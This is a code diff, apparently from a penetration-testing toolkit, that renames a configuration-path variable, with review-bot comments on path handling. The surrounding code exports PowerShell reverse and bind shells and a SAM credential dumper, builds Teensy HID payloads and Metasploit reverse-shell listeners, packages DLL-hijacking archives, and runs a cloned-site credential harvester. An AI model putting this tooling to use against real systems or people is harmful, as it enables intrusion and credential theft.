"set LPORT {0}\n" "set LPORT {0}\n"
@ -78,10 +78,10 @@ if powershell_menu_choice != "99":
msf_path = core.meta_path() msf_path = core.meta_path()
subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"), subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"),
os.path.join(core.setdir, "reports/powershell/powershell.rc")), os.path.join(core.userconfigpath, "reports/powershell/powershell.rc")),
shell=True).wait() shell=True).wait()
core.print_status("Powershell files can be found under {0}".format(os.path.join(core.setdir, "reports/powershell"))) core.print_status("Powershell files can be found under {0}".format(os.path.join(core.userconfigpath, "reports/powershell")))
core.return_continue() core.return_continue()
# if we select powershell reverse shell # if we select powershell reverse shell
@ -98,11 +98,11 @@ if powershell_menu_choice != "99":
data = fileopen.read() data = fileopen.read()
data = data.replace("IPADDRHERE", ipaddr) data = data.replace("IPADDRHERE", ipaddr)
data = data.replace("PORTHERE", port) data = data.replace("PORTHERE", port)
core.print_status("Exporting the powershell stuff to {0}".format(os.path.join(core.setdir, "reports/powershell"))) core.print_status("Exporting the powershell stuff to {0}".format(os.path.join(core.userconfigpath, "reports/powershell")))
# create the directory if it does not exist # create the directory if it does not exist
if not os.path.isdir(core.setdir + "/reports/powershell"): if not os.path.isdir(core.userconfigpath + "reports/powershell"):
os.makedirs(core.setdir + "/reports/powershell") os.makedirs(core.userconfigpath + "reports/powershell")
with open(core.setdir + "/reports/powershell/powershell.reverse.txt", "w") as filewrite: with open(core.userconfigpath + "reports/powershell/powershell.reverse.txt", "w") as filewrite:
filewrite.write(data) filewrite.write(data)
choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]") choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]")
@ -123,22 +123,22 @@ if powershell_menu_choice != "99":
data = fileopen.read() data = fileopen.read()
data = data.replace("PORTHERE", port) data = data.replace("PORTHERE", port)
# create the directory if it does not exist # create the directory if it does not exist
if not os.path.isdir(core.setdir + "/reports/powershell"): if not os.path.isdir(core.userconfigpath + "reports/powershell"):
os.makedirs(core.setdir + "/reports/powershell") os.makedirs(core.userconfigpath + "reports/powershell")
with open(core.setdir + "/reports/powershell/powershell.bind.txt", "w") as filewrite: with open(core.userconfigpath + "reports/powershell/powershell.bind.txt", "w") as filewrite:
filewrite.write(data) filewrite.write(data)
core.print_status("The powershell program has been exported to {0}".format(os.path.join(core.setdir, "reports/powershell/"))) core.print_status("The powershell program has been exported to {0}".format(os.path.join(core.userconfigpath, "reports/powershell/")))
core.return_continue() core.return_continue()
# if we select powershell powerdump SAM dump # if we select powershell powerdump SAM dump
if powershell_menu_choice == "4": if powershell_menu_choice == "4":
# create the directory if it does not exist # create the directory if it does not exist
if not os.path.isdir(core.setdir + "/reports/powershell"): if not os.path.isdir(core.userconfigpath + "reports/powershell"):
os.makedirs(core.setdir + "/reports/powershell") os.makedirs(core.userconfigpath + "reports/powershell")
# copy file # copy file
if os.path.isfile("src/powershell/powerdump.encoded"): if os.path.isfile("src/powershell/powerdump.encoded"):
shutil.copyfile("src/powershell/powerdump.encoded", core.setdir + "/reports/powershell/powerdump.encoded.txt") shutil.copyfile("src/powershell/powerdump.encoded", core.userconfigpath + "reports/powershell/powerdump.encoded.txt")
core.print_status("The powershell program has been exported to {}".format(os.path.join(core.setdir, "reports/powershell"))) core.print_status("The powershell program has been exported to {}".format(os.path.join(core.userconfigpath, "reports/powershell")))
core.print_status("Note with PowerDump -- You MUST be running as SYSTEM when executing.") core.print_status("Note with PowerDump -- You MUST be running as SYSTEM when executing.")
core.return_continue() core.return_continue()
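Review bot: The `if not os.path.isdir(core.userconfigpath + "reports/powershell"): os.makedirs(...)` guard is repeated verbatim in four menu branches of this section, and the same directory is spelled three different ways in the same file (`core.userconfigpath + "reports/powershell"`, `os.path.join(core.userconfigpath, "reports/powershell")`, and `os.path.join(core.userconfigpath, "reports/powershell/")`). Binding `report_dir = os.path.join(core.userconfigpath, "reports", "powershell")` once before the `powershell_menu_choice` branches and creating it there would remove the duplication and make the status messages and the `open()` targets provably the same path. If this module runs under Python 3, `os.makedirs(report_dir, exist_ok=True)` replaces the isdir check. The enclosing `if powershell_menu_choice != "99":` block starts before the hunk.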


@ -16,7 +16,7 @@ def gen_qrcode(url):
im = qr.make_image() im = qr.make_image()
time.sleep(1) time.sleep(1)
qr_img_path = os.path.join(core.setdir, "reports/qrcode_attack.png") qr_img_path = os.path.join(core.userconfigpath, "reports/qrcode_attack.png")
if os.path.isfile(qr_img_path): if os.path.isfile(qr_img_path):
os.remove(qr_img_path) os.remove(qr_img_path)


@ -308,24 +308,24 @@ Keyboard.send_now();
}""" % (random_filename,random_filename,powershell_command,vbs,bat,vbs,vbs,random_filename,alpha_payload,bat,vbs)) }""" % (random_filename,random_filename,powershell_command,vbs,bat,vbs,vbs,random_filename,alpha_payload,bat,vbs))
# delete temporary file # delete temporary file
subprocess.Popen("rm %s 1> /dev/null 2>/dev/null" % (random_filename), shell=True).wait() subprocess.Popen("rm %s 1> /dev/null 2>/dev/null" % (random_filename), shell=True).wait()
if not os.path.isdir(setdir + "reports"): os.makedirs(setdir + "reports") if not os.path.isdir(userconfigpath + "reports"): os.makedirs(userconfigpath + "reports")
print_status("Binary to Teensy file exported as %sreports/binary2teensy" % (setdir)) print_status("Binary to Teensy file exported as %sreports/binary2teensy" % (userconfigpath))
# write the teensy.ino file out # write the teensy.ino file out
filewrite = file(setdir + "reports/binary2teensy.ino", "w") filewrite = file(userconfigpath + "reports/binary2teensy.ino", "w")
# write the teensy.ino file out # write the teensy.ino file out
filewrite.write(output_variable) filewrite.write(output_variable)
# close the file # close the file
filewrite.close() filewrite.close()
print_status("Generating a listener...") print_status("Generating a listener...")
# create our metasploit answer file # create our metasploit answer file
filewrite = file(setdir + "answer.txt", "w") filewrite = file(userconfigpath + "answer.txt", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\n%s\nexploit -j" % (payload,ipaddr,port,url)) filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\n%s\nexploit -j" % (payload,ipaddr,port,url))
filewrite.close() filewrite.close()
# spawn a multi/handler listener # spawn a multi/handler listener
subprocess.Popen("msfconsole -r %sanswer.txt" % (setdir), shell=True).wait() subprocess.Popen("msfconsole -r %sanswer.txt" % (userconfigpath), shell=True).wait()
print_status("[*] Housekeeping old files...") print_status("[*] Housekeeping old files...")
# if our answer file is still there (which it should be), then remove it # if our answer file is still there (which it should be), then remove it
if os.path.isfile(setdir + "answer.txt"): if os.path.isfile(userconfigpath + "answer.txt"):
# remove the old file, no longer used once we've exited # remove the old file, no longer used once we've exited
subprocess.Popen("rm " + setdir + "answer.txt", shell=True).wait() subprocess.Popen("rm " + userconfigpath + "answer.txt", shell=True).wait()
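Review bot: The changed `filewrite = file(userconfigpath + "reports/binary2teensy.ino", "w")` and `filewrite = file(userconfigpath + "answer.txt", "w")` lines use the `file()` builtin, which exists only in Python 2; other files in this commit use `input()` and `print()` in Python 3 style, so if this module runs under the same interpreter both lines raise `NameError` before anything is written. `with open(userconfigpath + "reports/binary2teensy.ino", "w") as filewrite:` (and the same for `answer.txt`) works on both versions and makes the manual `filewrite.close()` calls unnecessary. The trailing cleanup, `subprocess.Popen("rm " + userconfigpath + "answer.txt", shell=True).wait()`, can be `os.remove(userconfigpath + "answer.txt")`, which needs no shell and fails loudly instead of silently when the path is wrong. The enclosing statement run starts before the hunk.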


@ -25,18 +25,18 @@ if payload == '':
payload = 'windows/meterpreter/reverse_http' payload = 'windows/meterpreter/reverse_http'
# create base metasploit payload to pass to powershell.prep # create base metasploit payload to pass to powershell.prep
with open(os.path.join(core.setdir + "metasploit.payload"), 'w') as filewrite: with open(os.path.join(core.userconfigpath, "metasploit.payload"), 'w') as filewrite:
filewrite.write(payload) filewrite.write(payload)
ipaddr = input("Enter the IP of the LHOST: ") ipaddr = input("Enter the IP of the LHOST: ")
port = input("Enter the port for the LHOST: ") port = input("Enter the port for the LHOST: ")
shellcode = core.generate_powershell_alphanumeric_payload(payload, ipaddr, port, "") shellcode = core.generate_powershell_alphanumeric_payload(payload, ipaddr, port, "")
with open(os.path.join(core.setdir + 'x86.powershell'), 'w') as filewrite: with open(os.path.join(core.userconfigpath, 'x86.powershell'), 'w') as filewrite:
filewrite.write(shellcode) filewrite.write(shellcode)
time.sleep(3) time.sleep(3)
with open(os.path.join(core.setdir + "x86.powershell")) as fileopen: with open(os.path.join(core.userconfigpath, "x86.powershell")) as fileopen:
pass pass
# read in x amount of bytes # read in x amount of bytes
data_read = int(50) data_read = int(50)
@ -153,9 +153,9 @@ Keyboard.send_now();
print("[*] Payload has been extracted. Copying file to root directory under reports/teensy.ino") print("[*] Payload has been extracted. Copying file to root directory under reports/teensy.ino")
if not os.path.isdir(os.path.join(core.setdir + "reports")): if not os.path.isdir(os.path.join(core.userconfigpath, "reports")):
os.makedirs(os.path.join(core.setdir + "reports")) os.makedirs(os.path.join(core.userconfigpath, "reports"))
with open(os.path.join(core.setdir + "reports/teensy.ino"), "w") as filewrite: with open(os.path.join(core.userconfigpath, "reports/teensy.ino"), "w") as filewrite:
filewrite.write(teensy) filewrite.write(teensy)
choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no] ") choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no] ")
if choice == "YES": if choice == "YES":
@ -173,7 +173,7 @@ if choice == "YES":
else: else:
port = input("Enter the port to connect back on: ") port = input("Enter the port to connect back on: ")
with open(os.path.join(core.setdir + "metasploit.answers"), "w") as filewrite: with open(os.path.join(core.userconfigpath, "metasploit.answers"), "w") as filewrite:
filewrite.write("use multi/handler\n" filewrite.write("use multi/handler\n"
"set payload {0}\n" "set payload {0}\n"
"set LHOST {1}\n" "set LHOST {1}\n"
@ -184,7 +184,7 @@ if choice == "YES":
print("[*] Launching Metasploit....") print("[*] Launching Metasploit....")
try: try:
child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"), child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.setdir + "metasploit.answers"))) os.path.join(core.userconfigpath, "metasploit.answers")))
child.interact() child.interact()
except: except:
pass pass
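Review bot: `os.path.join(core.meta_path() + "msfconsole")` is still the single-argument join that the commit removes on the very next line for userconfigpath; with one argument `os.path.join` returns its input unchanged, so this relies on `core.meta_path()` ending with a separator, which cannot be confirmed from here. For consistency with the new `os.path.join(core.userconfigpath, "metasploit.answers")` it should read `os.path.join(core.meta_path(), "msfconsole")`. The surrounding `try: ... except: pass` also swallows every failure of the launch, including a missing msfconsole binary and KeyboardInterrupt; `except Exception as err: core.print_error(str(err))` would at least surface why the listener did not start.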


@ -29,9 +29,9 @@ now = datetime.datetime.today()
if operating_system != "windows": if operating_system != "windows":
import pexpect import pexpect
# check to see if setdir is created # check to see if userconfigpath is created
if not os.path.isdir(os.path.join(core.setdir + "reports")): if not os.path.isdir(os.path.join(core.userconfigpath, "reports")):
os.makedirs(os.path.join(core.setdir + "reports")) os.makedirs(os.path.join(core.userconfigpath, "reports"))
definepath = os.getcwd() definepath = os.getcwd()
# define if use apache or not # define if use apache or not
@ -57,7 +57,7 @@ for line in apache_check:
# grab info from config file # grab info from config file
with open(os.path.join(core.setdir + "teensy")) as fileopen: with open(os.path.join(core.userconfigpath, "teensy")) as fileopen:
counter = 0 counter = 0
payload_counter = 0 payload_counter = 0
choice = None choice = None
@ -77,14 +77,14 @@ with open(os.path.join(core.setdir + "teensy")) as fileopen:
ipaddr = input(core.setprompt(["6"], "IP address to connect back on")) ipaddr = input(core.setprompt(["6"], "IP address to connect back on"))
core.update_options("IPADDR=" + ipaddr) core.update_options("IPADDR=" + ipaddr)
if not os.path.isfile(os.path.join(core.setdir + "teensy")): if not os.path.isfile(os.path.join(core.userconfigpath, "teensy")):
core.print_error("FATAL:Something went wrong, the Teensy config file was not created.") core.print_error("FATAL:Something went wrong, the Teensy config file was not created.")
core.exit_set() core.exit_set()
def writefile(filename, now): def writefile(filename, now):
with open(os.path.join("src/teensy/" + filename)) as fileopen, \ with open(os.path.join("src/teensy/" + filename)) as fileopen, \
open(os.path.join(core.setdir + "/reports/teensy_{0}.ino".format(now)), "w") as filewrite: open(os.path.join(core.userconfigpath, "reports/teensy_{0}.ino".format(now)), "w") as filewrite:
for line in fileopen: for line in fileopen:
match = re.search("IPADDR", line) match = re.search("IPADDR", line)
@ -128,7 +128,7 @@ if choice == "13":
# save our stuff here # save our stuff here
print(core.bcolors.BLUE + print(core.bcolors.BLUE +
"\n[*] INO file created. You can get it under '{0}'".format(os.path.join(core.setdir + "\n[*] INO file created. You can get it under '{0}'".format(os.path.join(core.userconfigpath,
"reports" + "reports" +
"teensy_{0}.ino".format(now))) + "teensy_{0}.ino".format(now))) +
core.bcolors.ENDC) core.bcolors.ENDC)
@ -142,8 +142,8 @@ print(core.bcolors.RED +
pause = input("Press {return} to continue.") pause = input("Press {return} to continue.")
if payload_counter == 1: if payload_counter == 1:
webclone_path = os.path.join(core.setdir + "web_clone") webclone_path = os.path.join(core.userconfigpath, "web_clone")
metasploit_exec_path = os.path.join(core.setdir + "msf.exe") metasploit_exec_path = os.path.join(core.userconfigpath, "msf.exe")
if not apache: if not apache:
subprocess.Popen("mkdir {0};" subprocess.Popen("mkdir {0};"
@ -158,13 +158,13 @@ if payload_counter == 1:
else: else:
subprocess.Popen("cp {0} {1}".format(metasploit_exec_path, os.path.join(webclone_path + "x.exe")), shell=True).wait() subprocess.Popen("cp {0} {1}".format(metasploit_exec_path, os.path.join(webclone_path + "x.exe")), shell=True).wait()
if os.path.isfile(os.path.join(core.setdir + "meta_config")): if os.path.isfile(os.path.join(core.userconfigpath, "meta_config")):
print(core.bcolors.BLUE + "\n[*] Launching MSF Listener...") print(core.bcolors.BLUE + "\n[*] Launching MSF Listener...")
print(core.bcolors.BLUE + "[*] This may take a few to load MSF..." + core.bcolors.ENDC) print(core.bcolors.BLUE + "[*] This may take a few to load MSF..." + core.bcolors.ENDC)
try: try:
if operating_system != "windows": if operating_system != "windows":
child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(msf_path + "msfconsole"), child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(msf_path + "msfconsole"),
os.path.join(core.setdir + "meta_config"))) os.path.join(core.userconfigpath, "meta_config")))
child1.interact() child1.interact()
except: except:
if operating_system != "windows": if operating_system != "windows":
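Review bot: The path printed in the `[*] INO file created` message is wrong: `"reports" + "teensy_{0}.ino".format(now)` concatenates to `reportsteensy_<now>.ino`, while writefile above saves the file to `reports/teensy_{0}.ino`; pass the components separately, `os.path.join(core.userconfigpath, "reports", "teensy_{0}.ino".format(now))`. The same single-argument join survives at `os.path.join(webclone_path + "x.exe")`: since `webclone_path` is now built with `os.path.join(core.userconfigpath, "web_clone")` and carries no trailing separator, the cp target becomes `web_clonex.exe` beside the directory rather than `x.exe` inside it, so `os.path.join(webclone_path, "x.exe")` is needed. `os.path.join(msf_path + "msfconsole")` has the same shape, but msf_path is defined outside the hunk, so whether it ends with a separator cannot be verified here.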


@ -13,15 +13,15 @@ port = ""
# see if multi_attack is being used and prep everything we need # see if multi_attack is being used and prep everything we need
multiattack = "off" multiattack = "off"
webdav_enabled = "off" webdav_enabled = "off"
if os.path.isfile(setdir + "/multi_payload"): if os.path.isfile(userconfigpath + "multi_payload"):
multiattack = "on" multiattack = "on"
# just need a simple filewrite to generate a file if webdav is enabled # just need a simple filewrite to generate a file if webdav is enabled
# this is used for multi attack, it will write out file to program junk # this is used for multi attack, it will write out file to program junk
# then a simple check will determine if webdav is enabled for the port # then a simple check will determine if webdav is enabled for the port
webdav_enabled = "off" webdav_enabled = "off"
webdav_write = open(setdir + "/webdav_enabled", "w") webdav_write = open(userconfigpath + "webdav_enabled", "w")
fileopen = open(setdir + "/multi_payload", "r") fileopen = open(userconfigpath + "multi_payload", "r")
for line in fileopen: for line in fileopen:
match = re.search("MAIN=", line) match = re.search("MAIN=", line)
if match: if match:
@ -60,8 +60,8 @@ for line in configfile:
# grab attack vector # grab attack vector
attack_vector = "" attack_vector = ""
if os.path.isfile(setdir + "/attack_vector"): if os.path.isfile(userconfigpath + "attack_vector"):
fileopen = open(setdir + "/attack_vector") fileopen = open(userconfigpath + "attack_vector")
for line in fileopen: for line in fileopen:
attack_vector = line.rstrip() attack_vector = line.rstrip()
@ -107,10 +107,10 @@ if multiattack == "off":
port = "443" port = "443"
# check to see if we need to use the multi attack vector in java # check to see if we need to use the multi attack vector in java
if not os.path.isfile(setdir + "/multi_java"): if not os.path.isfile(userconfigpath + "multi_java"):
filewrite = open(setdir + "/meta_config", "w") filewrite = open(userconfigpath + "meta_config", "w")
if os.path.isfile(setdir + "/multi_java"): if os.path.isfile(userconfigpath + "multi_java"):
filewrite = open(setdir + "/meta_config", "a") filewrite = open(userconfigpath + "meta_config", "a")
filewrite.write("use " + exploit + "\n") filewrite.write("use " + exploit + "\n")
filewrite.write("set PAYLOAD " + choice1 + "\n") filewrite.write("set PAYLOAD " + choice1 + "\n")
@ -160,10 +160,10 @@ filewrite.write("set ExitOnSession false\n")
# if we are using multiple meterpreter multiscripts # if we are using multiple meterpreter multiscripts
if meterpreter_multi == "ON": if meterpreter_multi == "ON":
multiwrite = open(setdir + "/multi_meter.file", "w") multiwrite = open(userconfigpath + "multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command) multiwrite.write(meterpreter_multi_command)
filewrite.write( filewrite.write(
"set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (setdir)) "set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (userconfigpath))
multiwrite.close() multiwrite.close()
# auto migration # auto migration
@ -180,6 +180,6 @@ if webdav_enabled == "on":
# this basically sets a flag we need to make some custom changes in web_server.py to get # this basically sets a flag we need to make some custom changes in web_server.py to get
# the docbase exploit to work properly # the docbase exploit to work properly
if exploit == ("windows/browser/java_docbase_bof"): if exploit == ("windows/browser/java_docbase_bof"):
filewrite = open(setdir + "/docbase.file", "w") filewrite = open(userconfigpath + "docbase.file", "w")
filewrite.write("DOCBASE=ON") filewrite.write("DOCBASE=ON")
filewrite.close() filewrite.close()
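Review bot: Every path in this hunk is now built by plain concatenation, `userconfigpath + "multi_payload"`, which only names the intended file if `core.userconfigpath` ends with a path separator — an invariant established outside this file and not checked anywhere here; the hunks starting `@ -60,7 +60,7 @@ for line in fileopen:`, `@ -75,7 +75,7 @@ except Exception as err:`, `@ -7,8 +7,8 @@ import datetime` and `@ -24,13 +24,13 @@ else:` use the same idiom. Elsewhere in this same commit the form `os.path.join(core.userconfigpath, "reports")` is used, which is correct with or without the trailing separator, so `os.path.isfile(os.path.join(userconfigpath, "multi_payload"))` would make this file consistent with the rest of the change. The `"%s/multi_meter.file" % (userconfigpath)` format in the same hunk adds its own separator, so the two styles cannot both be exact; a doubled slash is harmless on POSIX, but it shows the invariant is not being tracked. The `open(...)` handles for webdav_enabled, multi_payload and attack_vector are never closed; `with open(...) as fileopen:` blocks would release them.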


@ -60,7 +60,7 @@ for line in fileopen:
print("\n [*] You have selected the file extension of %s and vulnerable dll of %s" % (extension, dll)) print("\n [*] You have selected the file extension of %s and vulnerable dll of %s" % (extension, dll))
# prep the directories # prep the directories
subprocess.Popen("mkdir " + setdir + "/dll", stdout=subprocess.PIPE, subprocess.Popen("mkdir " + userconfigpath + "dll", stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True).wait() stderr=subprocess.PIPE, shell=True).wait()
filename1 = input(setprompt( filename1 = input(setprompt(
["2", "15"], "Enter the filename for the attack (example:openthis) [openthis]")) ["2", "15"], "Enter the filename for the attack (example:openthis) [openthis]"))
@ -68,7 +68,7 @@ if filename1 == "":
filename1 = "openthis" filename1 = "openthis"
# move the files there using the correct extension and file type # move the files there using the correct extension and file type
filewrite = open(setdir + "/dll/%s%s" % (filename1, extension), "w") filewrite = open(userconfigpath + "dll/%s%s" % (filename1, extension), "w")
filewrite.write("EMPTY") filewrite.write("EMPTY")
filewrite.close() filewrite.close()
@ -82,7 +82,7 @@ else:
fileopen = open("src/webattack/dll_hijacking/hijacking.dll", "rb") fileopen = open("src/webattack/dll_hijacking/hijacking.dll", "rb")
data = fileopen.read() data = fileopen.read()
filewrite = open(setdir + "/dll/%s" % (dll), "wb") filewrite = open(userconfigpath + "dll/%s" % (dll), "wb")
host = int(len(ipaddr) + 1) * "X" host = int(len(ipaddr) + 1) * "X"
@ -127,7 +127,7 @@ if choice == "1":
# we get a hit? # we get a hit?
if match: if match:
subprocess.Popen("cd %s/dll;rar a %s/template.rar * 1> /dev/null 2> /dev/null" % subprocess.Popen("cd %s/dll;rar a %s/template.rar * 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait() (userconfigpath, userconfigpath), shell=True).wait()
counter = 1 counter = 1
# if we didnt find rar # if we didnt find rar
@ -139,11 +139,11 @@ if choice == "1":
# if its a zipfile zip the badboy up # if its a zipfile zip the badboy up
if choice == "2": if choice == "2":
# write to a zipfile here # write to a zipfile here
file = zipfile.ZipFile(setdir + "/template.zip", "w") file = zipfile.ZipFile(userconfigpath + "template.zip", "w")
for name in glob.glob(setdir + "/dll/*"): for name in glob.glob(userconfigpath + "dll/*"):
file.write(name, os.path.basename(name), zipfile.ZIP_DEFLATED) file.write(name, os.path.basename(name), zipfile.ZIP_DEFLATED)
file.close() file.close()
if os.path.isfile(setdir + "/msf.exe"): if os.path.isfile(userconfigpath + "msf.exe"):
subprocess.Popen("cp %s/msf.exe %s/src/html/" % subprocess.Popen("cp %s/msf.exe %s/src/html/" %
(setdir, definepath), shell=True).wait() (userconfigpath, definepath), shell=True).wait()
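Review bot: `subprocess.Popen("mkdir " + userconfigpath + "dll", ..., shell=True)`, the `cd %s/dll;rar a ...` command and the final `cp %s/msf.exe %s/src/html/` all interpolate userconfigpath into a shell string unquoted; the new value appears to be a per-user directory (inferred from its name), so a path containing whitespace or shell metacharacters splits the command, and the piped stdout/stderr hide the resulting error. The mkdir and cp cases need no shell at all: `os.makedirs(userconfigpath + "dll", exist_ok=True)` and `shutil.copy(userconfigpath + "msf.exe", os.path.join(definepath, "src", "html"))` (exist_ok assumes Python 3, which the `print(...)` calls suggest; shutil would need importing if the file does not already). For the rar invocation, quoting each interpolated path with `shlex.quote` covers the remaining case.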


@ -75,7 +75,7 @@ except Exception as err:
attack_vector = "" attack_vector = ""
fileopen = open(setdir + "/attack_vector", "r") fileopen = open(userconfigpath + "attack_vector", "r")
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
if line == 'multiattack': if line == 'multiattack':
@ -111,7 +111,7 @@ for line in fileopen:
if match2: if match2:
command_center = "on" command_center = "on"
command_center_write = open( command_center_write = open(
setdir + "/cc_harvester_hit" % (setdir), "w") userconfigpath + "cc_harvester_hit" % (userconfigpath), "w")
# if nada default port 80 # if nada default port 80
if counter == 0: if counter == 0:
@ -119,7 +119,7 @@ if counter == 0:
# pull URL field # pull URL field
counter = 0 counter = 0
fileopen = open(setdir + "/site.template", "r").readlines() fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
match = re.search("URL=", line) match = re.search("URL=", line)
@ -166,10 +166,10 @@ for line in fileopen:
sys.path.append("src/core/ssl") sys.path.append("src/core/ssl")
# import our ssl module # import our ssl module
import setssl import setssl
subprocess.Popen("cp %s/CA/*.pem %s" % (setdir, setdir), subprocess.Popen("cp %s/CA/*.pem %s" % (userconfigpath, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# remove old junk we dont need anymore # remove old junk we dont need anymore
subprocess.Popen("rm -rf %s/CA;cp *.pem %s" % (setdir, setdir), subprocess.Popen("rm -rf %s/CA;cp *.pem %s" % (userconfigpath, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# if user wants to specify his/her own PEM certificate # if user wants to specify his/her own PEM certificate
@ -184,7 +184,7 @@ for line in fileopen:
print("\nUnable to find PEM file, check location and config again.") print("\nUnable to find PEM file, check location and config again.")
exit_set() exit_set()
if os.path.isfile(pem_client): if os.path.isfile(pem_client):
subprocess.Popen("cp %s %s/newcert.pem" % (pem_client, setdir), subprocess.Popen("cp %s %s/newcert.pem" % (pem_client, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
match2 = re.search("PEM_SERVER=", line) match2 = re.search("PEM_SERVER=", line)
if match2: if match2:
@ -193,7 +193,7 @@ for line in fileopen:
print("\nUnable to find PEM file, check location and config again.") print("\nUnable to find PEM file, check location and config again.")
exit_set() exit_set()
if os.path.isfile(pem_server): if os.path.isfile(pem_server):
subprocess.Popen("cp %s %s/newreq.pem" % (pem_server, setdir), subprocess.Popen("cp %s %s/newreq.pem" % (pem_server, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# url decode for postbacks # url decode for postbacks
@ -211,8 +211,8 @@ def urldecode(url):
# here is where we specify how many people actually visited versus fell for it # here is where we specify how many people actually visited versus fell for it
visits = open(setdir + "/visits.file", "a") visits = open(userconfigpath + "visits.file", "a")
bites = open(setdir + "/bites.file", "a") bites = open(userconfigpath + "bites.file", "a")
# SET Handler for handling POST requests and general setup through SSL # SET Handler for handling POST requests and general setup through SSL
@ -247,7 +247,7 @@ class SETHandler(BaseHTTPRequestHandler):
#print('-' * 40) #print('-' * 40)
pass pass
webroot = os.path.abspath(os.path.join(setdir, 'web_clone')) webroot = os.path.abspath(os.path.join(userconfigpath, 'web_clone'))
requested_file = os.path.abspath(os.path.join(webroot, self.path)) requested_file = os.path.abspath(os.path.join(webroot, self.path))
# try block setup to catch transmission errors # try block setup to catch transmission errors
try: try:
@ -256,7 +256,7 @@ class SETHandler(BaseHTTPRequestHandler):
self.send_response(200) self.send_response(200)
self.send_header('Content_type', 'text/html') self.send_header('Content_type', 'text/html')
self.end_headers() self.end_headers()
fileopen = open(setdir + "/web_clone/index.html", "r") fileopen = open(userconfigpath + "web_clone/index.html", "r")
for line in fileopen: for line in fileopen:
self.wfile.write(line) self.wfile.write(line)
# write out that we had a visit # write out that we had a visit
@ -268,7 +268,7 @@ class SETHandler(BaseHTTPRequestHandler):
self.send_response(200) self.send_response(200)
self.send_header('Content_type', 'text/html') self.send_header('Content_type', 'text/html')
self.end_headers() self.end_headers()
fileopen = open(setdir + "/web_clone/index2.html", "r") fileopen = open(userconfigpath + "web_clone/index2.html", "r")
for line in fileopen: for line in fileopen:
self.wfile.write(line) self.wfile.write(line)
# write out that we had a visit # write out that we had a visit
@ -310,7 +310,7 @@ class SETHandler(BaseHTTPRequestHandler):
# change path to root for append on file # change path to root for append on file
os.chdir(homepath) os.chdir(homepath)
# put the params into site.template for later user # put the params into site.template for later user
filewrite = open(setdir + "/site.template", "a") filewrite = open(userconfigpath + "site.template", "a")
filewrite.write("\n") filewrite.write("\n")
if not os.path.isfile("%s/src/logs/harvester.log" % (os.getcwd())): if not os.path.isfile("%s/src/logs/harvester.log" % (os.getcwd())):
filewrite3 = open("%s/src/logs/harvester.log" % os.getcwd(), "w") filewrite3 = open("%s/src/logs/harvester.log" % os.getcwd(), "w")
@ -356,7 +356,7 @@ class SETHandler(BaseHTTPRequestHandler):
# pull URL field # pull URL field
counter = 0 counter = 0
fileopen = open(setdir + "/site.template", "r").readlines() fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
match = re.search("URL=", line) match = re.search("URL=", line)
@ -380,7 +380,7 @@ class SETHandler(BaseHTTPRequestHandler):
'<html><head><meta HTTP-EQUIV="REFRESH" content="0; url=%s"></head></html>' % (RAW_URL)) '<html><head><meta HTTP-EQUIV="REFRESH" content="0; url=%s"></head></html>' % (RAW_URL))
# set it back to our homepage # set it back to our homepage
os.chdir(setdir + "/web_clone/") os.chdir(userconfigpath + "web_clone/")
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer): class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
@ -526,37 +526,37 @@ def run():
(logpath, harvester_file), shell=True).wait() (logpath, harvester_file), shell=True).wait()
# if we are using webjacking, etc. # if we are using webjacking, etc.
if os.path.isfile(setdir + "/web_clone/index2.html"): if os.path.isfile(userconfigpath + "web_clone/index2.html"):
# need to copy the files over - remove the old one first if there # need to copy the files over - remove the old one first if there
if os.path.isfile(apache_dir + "/index2.html"): if os.path.isfile(apache_dir + "/index2.html"):
os.remove(apache_dir + "/index2.html") os.remove(apache_dir + "/index2.html")
shutil.copyfile(setdir + "/web_clone/index2.html", shutil.copyfile(userconfigpath + "web_clone/index2.html",
apache_dir + "/index2.html") apache_dir + "/index2.html")
# here we specify if we are tracking users and such # here we specify if we are tracking users and such
if track_email == True: if track_email == True:
fileopen = open(setdir + "/web_clone/index.html", "r") fileopen = open(userconfigpath + "web_clone/index.html", "r")
data = fileopen.read() data = fileopen.read()
data = data.replace( data = data.replace(
